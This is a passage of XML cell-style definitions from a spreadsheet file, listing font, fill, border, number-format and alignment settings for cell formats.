    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="top"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="22" borderId="19" applyNumberFormat="0" applyFont="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="17" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="22"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9" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="28"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4" fillId="0" borderId="13" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="13" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="21" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="0" borderId="16" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="17" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="10" borderId="17" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="10" borderId="15" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="13" borderId="18" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="12" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="6" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="12" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="14" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="12" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="20" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="8" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="15"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22" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="17" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="13" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="18" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="22" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="20" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="19" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="8" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="16" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="7" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="9" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="9" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0"/>
  </cellStyleXfs>
  <cellXfs count="237">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="4" fontId="0" fillId="2" borderId="1" xfId="0" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="177" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="177" fontId="3" fillId="2" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="1" xfId="0"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shrinkToFit="1"/>
    </xf>
    <xf numFmtId="49" fontId="4" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="4" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="4"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1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="49" fontId="0" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="1" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="1" xfId="5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4" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="49" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4"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0" fontId="0" fillId="0" borderId="5"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6" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="4" fontId="4" fillId="0" borderId="1" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="4" fillId="2" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="4" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="177" fontId="4" fillId="2" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="177" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignmen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4" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="179" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="4" fillId="0" borderId="0"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1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="177" fontId="4" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="4" fontId="4" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="1" xfId="0" applyNumberFormat="1"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4" fillId="4" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6"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xf>
    <xf numFmtId="178" fontId="4" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="4" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="2"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180" fontId="4" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="177" fontId="4" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="4" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="4" borderId="4"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shrinkToFit="1"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="4"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 xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="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4" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="3" fillId="2" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="4" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="5" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="5" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="5" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0"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3" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="49" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="178" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="4" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="3" fillId="2" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="178" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="179" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="4"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0" fillId="0" borderId="8" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="4" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="178" fontId="3" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="7"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3" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="177" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="178" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="4" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="4" fontId="3" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="51" applyFont="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="51" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="51" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="9" fontId="3" fillId="0" borderId="0" xfId="51" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="51" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="51" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="51" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="51" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="51" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="51" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="51" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="51" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="51" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="51" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="51" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="178" fontId="3" fillId="0" borderId="1" xfId="51" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="9" fontId="3" fillId="0" borderId="1" xfId="51" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="4" fontId="3" fillId="0" borderId="1" xfId="51" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="3" fillId="2" borderId="1" xfId="51" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="3" fillId="0" borderId="1" xfId="51" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
